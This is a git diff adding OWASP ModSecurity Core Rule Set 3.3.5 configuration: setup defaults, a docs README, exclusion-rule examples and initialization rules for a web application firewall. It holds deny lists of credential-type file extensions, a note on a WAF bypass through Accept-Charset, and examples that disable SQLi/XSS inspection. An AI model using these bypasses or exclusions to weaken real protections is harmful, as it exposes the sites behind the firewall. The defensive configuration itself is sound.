.com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/ +# Example: .bak/ .config/ .conf/ .db/ .ini/ .log/ .old/ .pass/ .pdb/ .rdb/ .sql/ +# Uncomment this rule to change the default. +#SecAction \ +# "id:900240,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" + +# Forbidden request headers. +# Header names should be lowercase, enclosed by /slashes/ as delimiters. +# Default: /accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ +# +# Note: Accept-Charset is a deprecated header that should not be used by clients and +# ignored by servers. It can be used for a response WAF bypass, by asking for a charset +# that the WAF cannot decode. +# Reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Charset +# +# Note: Content-Encoding is used to list any encodings that have been applied to the +# original payload. It is only used for compression, which isn't supported by CRS by +# default since it blocks newlines and null bytes inside the request body. Most +# compression algorithms require at least null bytes per RFC. Blocking it shouldn't +# break anything and increases security since ModSecurity is incapable of properly +# scanning compressed request bodies. +# +# Note: Blocking Proxy header prevents 'httpoxy' vulnerability: https://httpoxy.org +# +# Uncomment this rule to change the default. +#SecAction \ +# "id:900250,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.restricted_headers=/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/'" + +# File extensions considered static files. +# Extensions include the dot, lowercase, enclosed by /slashes/ as delimiters. +# Used in DoS protection rule. See section "Anti-Automation / DoS Protection". +# Default: /.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/ +# Uncomment this rule to change the default. +#SecAction \ +# "id:900260,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'" + +# Content-Types charsets that a client is allowed to send in a request. +# Default: utf-8|iso-8859-1|iso-8859-15|windows-1252 +# Uncomment this rule to change the default. +# Use "|" to separate multiple charsets like in the rule defining +# tx.allowed_request_content_type. +#SecAction \ +# "id:900280,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'" + +# +# -- [[ HTTP Argument/Upload Limits ]] ----------------------------------------- +# +# Here you can define optional limits on HTTP get/post parameters and uploads. +# This can help to prevent application specific DoS attacks. +# +# These values are checked in REQUEST-920-PROTOCOL-ENFORCEMENT.conf. +# Beware of blocking legitimate traffic when enabling these limits. +# + +# Block request if number of arguments is too high +# Default: unlimited +# Example: 255 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900300,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.max_num_args=255" + +# Block request if the length of any argument name is too high +# Default: unlimited +# Example: 100 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900310,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.arg_name_length=100" + +# Block request if the length of any argument value is too high +# Default: unlimited +# Example: 400 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900320,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.arg_length=400" + +# Block request if the total length of all combined arguments is too high +# Default: unlimited +# Example: 64000 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900330,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.total_arg_length=64000" + +# Block request if the file size of any individual uploaded file is too high +# Default: unlimited +# Example: 1048576 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900340,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.max_file_size=1048576" + +# Block request if the total size of all combined uploaded files is too high +# Default: unlimited +# Example: 1048576 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900350,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.combined_file_sizes=1048576" + + +# +# -- [[ Easing In / Sampling Percentage ]] ------------------------------------- +# +# Adding the Core Rule Set to an existing productive site can lead to false +# positives, unexpected performance issues and other undesired side effects. +# +# It can be beneficial to test the water first by enabling the CRS for a +# limited number of requests only and then, when you have solved the issues (if +# any) and you have confidence in the setup, to raise the ratio of requests +# being sent into the ruleset. +# +# Adjust the percentage of requests that are funnelled into the Core Rules by +# setting TX.sampling_percentage below. The default is 100, meaning that every +# request gets checked by the CRS. The selection of requests, which are going +# to be checked, is based on a pseudo random number generated by ModSecurity. +# +# If a request is allowed to pass without being checked by the CRS, there is no +# entry in the audit log (for performance reasons), but an error log entry is +# written. If you want to disable the error log entry, then issue the +# following directive somewhere after the inclusion of the CRS +# (E.g., RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf). +# +# SecRuleUpdateActionById 901150 "nolog" +# +# ATTENTION: If this TX.sampling_percentage is below 100, then some of the +# requests will bypass the Core Rules completely and you lose the ability to +# protect your service with ModSecurity. +# +# Uncomment this rule to enable this feature: +# +#SecAction "id:900400,\ +# phase:1,\ +# pass,\ +# nolog,\ +# setvar:tx.sampling_percentage=100" + + +# +# -- [[ Project Honey Pot HTTP Blacklist ]] ------------------------------------ +# +# Optionally, you can check the client IP address against the Project Honey Pot +# HTTPBL (dnsbl.httpbl.org). In order to use this, you need to register to get a +# free API key. Set it here with SecHttpBlKey. +# +# Project Honeypot returns multiple different malicious IP types. +# You may specify which you want to block by enabling or disabling them below. +# +# Ref: https://www.projecthoneypot.org/httpbl.php +# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey +# +# Uncomment these rules to use this feature: +# +#SecHttpBlKey XXXXXXXXXXXXXXXXX +#SecAction "id:900500,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.block_search_ip=1,\ +# setvar:tx.block_suspicious_ip=1,\ +# setvar:tx.block_harvester_ip=1,\ +# setvar:tx.block_spammer_ip=1" + + +# +# -- [[ GeoIP Database ]] ------------------------------------------------------ +# +# There are some rulesets that inspect geolocation data of the client IP address +# (geoLookup). The CRS uses geoLookup to implement optional country blocking. +# +# To use geolocation, we make use of the MaxMind GeoIP database. +# This database is not included with the CRS and must be downloaded. +# +# There are two formats for the GeoIP database. ModSecurity v2 uses GeoLite (.dat files), +# and ModSecurity v3 uses GeoLite2 (.mmdb files). +# +# If you use ModSecurity 3, MaxMind provides a binary for updating GeoLite2 files, +# see https://github.com/maxmind/geoipupdate. +# +# Download the package for your OS, and read https://dev.maxmind.com/geoip/geoipupdate/ +# for configuration options. +# +# Warning: GeoLite (not GeoLite2) databases are considered legacy, and not being updated anymore. +# See https://support.maxmind.com/geolite-legacy-discontinuation-notice/ for more info. +# +# Therefore, if you use ModSecurity v2, you need to regenerate updated .dat files +# from CSV files first. +# +# You can achieve this using https://github.com/sherpya/geolite2legacy +# Pick the zip files from maxmind site: +# https://geolite.maxmind.com/download/geoip/database/GeoLite2-Country-CSV.zip +# +# Follow the guidelines for installing the tool and run: +# ./geolite2legacy.py -i GeoLite2-Country-CSV.zip \ +# -f geoname2fips.csv -o /usr/share/GeoliteCountry.dat +# +# Update the database regularly, see Step 3 of the configuration link above. +# +# By default, when you execute `sudo geoipupdate` on Linux, files from the free database +# will be downloaded to `/usr/share/GeoIP` (both v1 and v2). +# +# Then choose from: +# - `GeoLite2-Country.mmdb` (if you are using ModSecurity v3) +# - `GeoLiteCountry.dat` (if you are using ModSecurity v2) +# +# Ref: http://blog.spiderlabs.com/2010/10/detecting-malice-with-modsecurity-geolocation-data.html +# Ref: http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html +# +# Uncomment only one of the next rules here to use this feature. +# Choose the one depending on the ModSecurity version you are using, and change the path accordingly: +# +# For ModSecurity v3: +#SecGeoLookupDB /usr/share/GeoIP/GeoLite2-Country.mmdb +# For ModSecurity v2 (points to the converted one): +#SecGeoLookupDB /usr/share/GeoIP/GeoLiteCountry.dat + +# +# -=[ Block Countries ]=- +# +# Rules in the IP Reputation file can check the client against a list of high +# risk country codes. These countries have to be defined in the variable +# tx.high_risk_country_codes via their ISO 3166 two-letter country code: +# https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2#Officially_assigned_code_elements +# +# If you are sure that you are not getting any legitimate requests from a given +# country, then you can disable all access from that country via this variable. +# The rule performing the test has the rule id 910100. +# +# This rule requires SecGeoLookupDB to be enabled and the GeoIP database to be +# downloaded (see the section "GeoIP Database" above.) +# +# By default, the list is empty. A list used by some sites was the following: +# setvar:'tx.high_risk_country_codes=UA ID YU LT EG RO BG TR RU PK MY CN'" +# +# Uncomment this rule to use this feature: +# +#SecAction \ +# "id:900600,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.high_risk_country_codes='" + + +# +# -- [[ Anti-Automation / DoS Protection ]] ------------------------------------ +# +# Optional DoS protection against clients making requests too quickly. +# +# When a client is making more than 100 requests (excluding static files) within +# 60 seconds, this is considered a 'burst'. After two bursts, the client is +# blocked for 600 seconds. +# +# Requests to static files are not counted towards DoS; they are listed in the +# 'tx.static_extensions' setting, which you can change in this file (see +# section "HTTP Policy Settings"). +# +# For a detailed description, see rule file REQUEST-912-DOS-PROTECTION.conf. +# +# Uncomment this rule to use this feature: +# +#SecAction \ +# "id:900700,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.dos_burst_time_slice=60',\ +# setvar:'tx.dos_counter_threshold=100',\ +# setvar:'tx.dos_block_timeout=600'" + + +# +# -- [[ Check UTF-8 encoding ]] ------------------------------------------------ +# +# The CRS can optionally check request contents for invalid UTF-8 encoding. +# We only want to apply this check if UTF-8 encoding is actually used by the +# site; otherwise it will result in false positives. +# +# Uncomment this rule to use this feature: +# +#SecAction \ +# "id:900950,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.crs_validate_utf8_encoding=1" + + +# +# -- [[ Blocking Based on IP Reputation ]] ------------------------------------ +# +# Blocking based on reputation is permanent in the CRS. Unlike other rules, +# which look at the individual request, the blocking of IPs is based on +# a persistent record in the IP collection, which remains active for a +# certain amount of time. +# +# There are two ways an individual client can become flagged for blocking: +# - External information (RBL, GeoIP, etc.) +# - Internal information (Core Rules) +# +# The record in the IP collection carries a flag, which tags requests from +# individual clients with a flag named IP.reput_block_flag. +# But the flag alone is not enough to have a client blocked. There is also +# a global switch named tx.do_reput_block. This is off by default. If you set +# it to 1 (=On), requests from clients with the IP.reput_block_flag will +# be blocked for a certain duration. +# +# Variables +# ip.reput_block_flag Blocking flag for the IP collection record +# ip.reput_block_reason Reason (= rule message) that caused to blocking flag +# tx.do_reput_block Switch deciding if we really block based on flag +# tx.reput_block_duration Setting to define the duration of a block +# +# It may be important to know, that all the other core rules are skipped for +# requests, when it is clear that they carry the blocking flag in question. +# +# Uncomment this rule to use this feature: +# +#SecAction \ +# "id:900960,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.do_reput_block=1" +# +# Uncomment this rule to change the blocking time: +# Default: 300 (5 minutes) +# +#SecAction \ +# "id:900970,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.reput_block_duration=300" + + +# +# -- [[ Collection timeout ]] -------------------------------------------------- +# +# Set the SecCollectionTimeout directive from the ModSecurity default (1 hour) +# to a lower setting which is appropriate to most sites. +# This increases performance by cleaning out stale collection (block) entries. +# +# This value should be greater than or equal to: +# tx.reput_block_duration (see section "Blocking Based on IP Reputation") and +# tx.dos_block_timeout (see section "Anti-Automation / DoS Protection"). +# +# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecCollectionTimeout + +# Please keep this directive uncommented. +# Default: 600 (10 minutes) +SecCollectionTimeout 600 + + +# +# -- [[ End of setup ]] -------------------------------------------------------- +# +# The CRS checks the tx.crs_setup_version variable to ensure that the setup +# has been loaded. If you are not planning to use this setup template, +# you must manually set the tx.crs_setup_version variable before including +# the CRS rules/* files. +# +# The variable is a numerical representation of the CRS version number. +# E.g., v3.0.0 is represented as 300. +# +SecAction \ + "id:900990,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:tx.crs_setup_version=335" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/docs/README b/src/common/core/modsecurity/files/coreruleset-v3/docs/README new file mode 100644 index 000000000..281651e7e --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/docs/README @@ -0,0 +1,8 @@ +Welcome to the OWASP Core Rule Set (CRS) documentation. +The OWASP CRS documentation is generated as a Sphinx project and is stored in a separate Github repository. While the documentation is available as part of the CRS project it is provided in the form of a git-submodule. Using a git-submodule allow us to update the documentation without making changes to the main rule repository. + +You can download the documentation using git: + $ git submodule init + $ git submodule update + +Alternatively, the latest version of the documentation is available at https://www.modsecurity.org/CRS/Documentation/ diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example new file mode 100644 index 000000000..ad857bfb0 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example @@ -0,0 +1,166 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# The purpose of this file is to hold LOCAL exceptions for your site. The +# types of rules that would go into this file are one where you want to +# short-circuit inspection and allow certain transactions to pass through +# inspection or if you want to alter rules that are applied. +# +# This file is named REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example for a +# very specific reason. Files affixed with the .example extension are designed +# to contain user created/modified data. The '.example'. extension should be +# renamed to end in .conf. The advantage of this is that when OWASP CRS is +# updated, the updates will not overwrite a user generated configuration file. +# +# As a result of this design paradigm users are encouraged NOT to directly +# modify rules. Instead they should use this +# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS and the +# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS file to modify OWASP rules using +# methods similar to the examples specified below. +# +# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS and +# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS serve different purposes. ModSecurity +# effectively maintains two different context: startup, and per transaction. +# As a rule, directives are processed within the startup context. While they +# can affect the per transaction context they generally remain fixed during the +# execution of ModSecurity. +# +# As a result if one wanted to disable a rule at bootup the SecRuleRemoveById +# directive or one of its siblings would have to be placed AFTER the rule is +# listed, otherwise it will not have knowledge of the rules existence (since +# these rules are read in at the same time). This means that when using +# directives that effect SecRules, these exceptions should be placed AFTER all +# the existing rules. This is why RESPONSE-999-EXCLUSION-RULES-AFTER-CRS is +# designed such that it loads LAST. +# +# Conversely, ModSecurity supports several actions that can change the state of +# the underlying configuration during the per transaction context, this is when +# rules are being processed. Generally, these are accomplished by using the +# 'ctl' action. As these are part of a rule, they will be evaluated in the +# order rules are applied (by physical location, considering phases). As a +# result of this ordering a 'ctl' action should be placed with consideration to +# when it will be executed. This is particularly relevant for the 'ctl' options +# that involve modifying ID's (such as ruleRemoveById). In these cases it is +# important that such rules are placed BEFORE the rule ID they will affect. +# Unlike the setup context, by the time we process rules in the per-transaction +# context, we are already aware of all the rule ID's. It is by this logic that +# we include rules such as this BEFORE all the remaining rules. As a result +# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS is designed to load FIRST. +# +# As a general rule: +# ctl:ruleEngine -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS +# ctl:ruleRemoveById -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS +# ctl:ruleRemoveByMsg -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS +# ctl:ruleRemoveByTag -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS +# ctl:ruleRemoveTargetById -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS +# ctl:ruleRemoveTargetByMsg -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS +# ctl:ruleRemoveTargetByTag -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS +# +# SecRuleRemoveById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS +# SecRuleRemoveByMsg -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS +# SecRuleRemoveByTag -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS +# SecRuleUpdateActionById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS +# SecRuleUpdateTargetById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS +# SecRuleUpdateTargetByMsg -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS +# SecRuleUpdateTargetByTag -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS +# +# +# What follows are a group of examples that show you how to perform rule +# exclusions. +# +# +# Example Exclusion Rule: Disable inspection for an authorized client +# +# This ruleset allows you to control how ModSecurity will handle traffic +# originating from Authorized Vulnerability Scanning (AVS) sources. See +# related blog post - +# http://blog.spiderlabs.com/2010/12/advanced-topic-of-the-week-handling-authorized-scanning-traffic.html +# +# White-list ASV network block (no blocking or logging of AVS traffic) Update +# IP network block as appropriate for your AVS traffic +# +# ModSec Rule Exclusion: Disable Rule Engine for known ASV IP +# SecRule REMOTE_ADDR "@ipMatch 192.168.1.100" \ +# "id:1000,\ +# phase:1,\ +# pass,\ +# nolog,\ +# ctl:ruleEngine=Off" +# +# +# Example Exclusion Rule: Removing a specific ARGS parameter from inspection +# for an individual rule +# +# This rule shows how to conditionally exclude the "password" +# parameter for rule 942100 when the REQUEST_URI is /index.php +# ModSecurity Rule Exclusion: 942100 SQL Injection Detected via libinjection +# +# SecRule REQUEST_URI "@beginsWith /index.php" \ +# "id:1001,\ +# phase:1,\ +# pass,\ +# nolog,\ +# ctl:ruleRemoveTargetById=942100;ARGS:password" +# +# +# Example Exclusion Rule: Removing a specific ARGS parameter from inspection +# for only certain attacks +# +# Attack rules within the CRS are tagged, with tags such as 'attack-lfi', +# 'attack-sqli', 'attack-xss', 'attack-injection-php', et cetera. +# +# ModSecurity Rule Exclusion: Disable inspection of ARGS:pwd +# for all rules tagged attack-sqli +# SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ +# "id:1002,\ +# phase:2,\ +# pass,\ +# nolog,\ +# ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:pwd" +# + +# Example Exclusion Rule: Removing a specific ARGS parameter from inspection +# for all CRS rules +# +# This rule illustrates that we can use tagging very effectively to whitelist a +# common false positive across an entire ModSecurity instance. This can be done +# because every rule in OWASP_CRS is tagged with OWASP_CRS. This will NOT +# affect custom rules. +# +# ModSecurity Rule Exclusion: Disable inspection of ARGS:pwd +# for all CRS rules +# SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ +# "id:1003,\ +# phase:2,\ +# pass,\ +# nolog,\ +# ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd" + +# +# Example Exclusion Rule: Removing a range of rules +# +# This rule illustrates that we can remove a rule range via a ctl action. +# This uses the fact, that rules are grouped by topic in rule files covering +# a certain id range. +# +# ModSecurity Rule Exclusion: Disable all SQLi and XSS rules +# SecRule REQUEST_FILENAME "@beginsWith /admin" \ +# "id:1004,\ +# phase:2,\ +# pass,\ +# nolog,\ +# ctl:ruleRemoveById=941000-942999" +# +# +# The application specific rule exclusion files +# REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf +# REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf +# bring additional examples which can be useful then tuning a service. diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-901-INITIALIZATION.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-901-INITIALIZATION.conf new file mode 100644 index 000000000..27fd54ad1 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-901-INITIALIZATION.conf @@ -0,0 +1,470 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# This file REQUEST-901-INITIALIZATION.conf initializes the Core Rules +# and performs preparatory actions. It also fixes errors and omissions +# of variable definitions in the file crs-setup.conf. +# The setup.conf can and should be edited by the user, this file +# is part of the CRS installation and should not be altered. +# + + +# +# -=[ Rules Version ]=- +# +# Rule version data is added to the "Producer" line of Section H of the Audit log: +# +# - Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); OWASP_CRS/3.1.0. +# +# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecComponentSignature +# +SecComponentSignature "OWASP_CRS/3.3.5" + +# +# -=[ Default setup values ]=- +# +# The CRS checks the tx.crs_setup_version variable to ensure that the setup +# file is included at the correct time. This detects situations where +# necessary settings are not defined, for instance if the file +# inclusion order is incorrect, or if the user has forgotten to +# include the crs-setup.conf file. +# +# If you are upgrading from an earlier version of the CRS and you are +# getting this error, please make a new copy of the setup template +# crs-setup.conf.example to crs-setup.conf, and re-apply your policy +# changes. There have been many changes in settings syntax from CRS2 +# to CRS3, so an old setup file may cause unwanted behavior. +# +# If you are not planning to use the crs-setup.conf template, you must +# manually set the tx.crs_setup_version variable before including +# the CRS rules/* files. +# +# The variable is a numerical representation of the CRS version number. +# E.g., v3.0.0 is represented as 300. +# + +SecRule &TX:crs_setup_version "@eq 0" \ + "id:901001,\ + phase:1,\ + deny,\ + status:500,\ + log,\ + auditlog,\ + msg:'ModSecurity Core Rule Set is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL'" + + +# +# -=[ Default setup values ]=- +# +# Some constructs or individual rules will fail if certain parameters +# are not set in the setup.conf file. The following rules will catch +# these cases and assign sane default values. +# + +# Default Inbound Anomaly Threshold Level (rule 900110 in setup.conf) +SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \ + "id:901100,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.inbound_anomaly_score_threshold=5'" + +# Default Outbound Anomaly Threshold Level (rule 900110 in setup.conf) +SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \ + "id:901110,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.outbound_anomaly_score_threshold=4'" + +# Default Paranoia Level (rule 900000 in setup.conf) +SecRule &TX:paranoia_level "@eq 0" \ + "id:901120,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.paranoia_level=1'" + +# Default Executing Paranoia Level (rule 900000 in setup.conf) +SecRule &TX:executing_paranoia_level "@eq 0" \ + "id:901125,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.executing_paranoia_level=%{TX.PARANOIA_LEVEL}'" + +# Default Sampling Percentage (rule 900400 in setup.conf) +SecRule &TX:sampling_percentage "@eq 0" \ + "id:901130,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.sampling_percentage=100'" + +# Default Anomaly Scores (rule 900100 in setup.conf) +SecRule &TX:critical_anomaly_score "@eq 0" \ + "id:901140,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.critical_anomaly_score=5'" + +SecRule &TX:error_anomaly_score "@eq 0" \ + "id:901141,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.error_anomaly_score=4'" + +SecRule &TX:warning_anomaly_score "@eq 0" \ + "id:901142,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.warning_anomaly_score=3'" + +SecRule &TX:notice_anomaly_score "@eq 0" \ + "id:901143,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.notice_anomaly_score=2'" + +# Default do_reput_block +SecRule &TX:do_reput_block "@eq 0" \ + "id:901150,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.do_reput_block=0'" + +# Default block duration +SecRule &TX:reput_block_duration "@eq 0" \ + "id:901152,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.reput_block_duration=300'" + +# Default HTTP policy: allowed_methods (rule 900200) +SecRule &TX:allowed_methods "@eq 0" \ + "id:901160,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" + +# Default HTTP policy: allowed_request_content_type (rule 900220) +SecRule &TX:allowed_request_content_type "@eq 0" \ + "id:901162,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'" + +# Default HTTP policy: allowed_request_content_type_charset (rule 900270) +SecRule &TX:allowed_request_content_type_charset "@eq 0" \ + "id:901168,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'" + +# Default HTTP policy: allowed_http_versions (rule 900230) +SecRule &TX:allowed_http_versions "@eq 0" \ + "id:901163,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'" + +# Default HTTP policy: restricted_extensions (rule 900240) +SecRule &TX:restricted_extensions "@eq 0" \ + "id:901164,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" + +# Default HTTP policy: restricted_headers (rule 900250) +SecRule &TX:restricted_headers "@eq 0" \ + "id:901165,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.restricted_headers=/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/'" + +# Default HTTP policy: static_extensions (rule 900260) +SecRule &TX:static_extensions "@eq 0" \ + "id:901166,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'" + +# Default enforcing of body processor URLENCODED +SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \ + "id:901167,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.enforce_bodyproc_urlencoded=0'" + +# Default check for UTF8 encoding validation +SecRule &TX:crs_validate_utf8_encoding "@eq 0" \ + "id:901169,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.crs_validate_utf8_encoding=0'" + +# Default monitor_anomaly_score value +SecRule &TX:monitor_anomaly_score "@eq 0" \ + "id:901170,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.monitor_anomaly_score=0'" + +# +# 